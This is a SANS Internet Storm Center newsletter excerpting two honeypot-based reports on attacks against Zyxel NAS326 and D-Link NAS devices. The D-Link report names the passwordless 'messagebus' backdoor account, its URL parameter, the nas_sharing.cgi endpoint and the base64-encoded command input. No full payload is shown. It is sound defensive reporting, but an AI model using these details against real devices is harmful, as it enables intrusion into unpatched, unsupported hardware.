INTERNET STORM CENTER SPOTLIGHT
ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html
Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
Published: 2024-04-30
Last Updated: 2024-04-30 15:19:40 UTC
by Johannes Ullrich (Version: 1)
Yesterday, I talked about attacks against a relatively recent D-Link NAS vulnerability. Today, scanning my honeypot logs, I found an odd URL that I didn't recognize. The vulnerability is a bit older but turns out to be targeting yet another NAS.
The sample request ...
The exploit is simple: attempt to download and execute the "amanas2" binary and execute it. Sadly, I was not able to retrieve the file. Virustotal does show the URL as malicious for a couple of anti-malware tools.
Oddly, I am seeing this pattern only the last couple days, even though the vulnerability and the PoC were disclosed last year ...
Read the full entry:
D-Link NAS Device Backdoor Abused
Published: 2024-04-29
Last Updated: 2024-04-29 13:48:03 UTC
by Johannes Ullrich (Version: 1)
End of March, NetworkSecurityFish disclosed a vulnerability in various D-Link NAS devices. The vulnerability allows access to the device using the user "messagebus" without credentials. The sample URL used by the PoC was ...
In addition to not requiring a password, the URL also accepts arbitrary system commands, which must be base64 encoded. Initial exploit attempts were detected as soon as April 8th. The vulnerability is particularly dangerous as some affected devices are no longer supported by DLink, and no patch is expected to be released. DLink instead advised to replace affected devices. I have not been able to find an associated CVE number.
[Graph of hits for URLs that include "user=messagebus" with two distinct peaks. One early in April and one late in April]
After the initial exploit attempts at the beginning of the month, we now see a new distinct set of exploit attempts, some of which use different URLs to attack vulnerable systems. It appears that nas_sharing<dot>cgi is not the only endpoint that can be used to take advantage of the passwordless "messagebus" account.
Read the full entry:
https://isc.sans.edu/diary/DLink+NAS+Device+Backdoor+Abused/30878/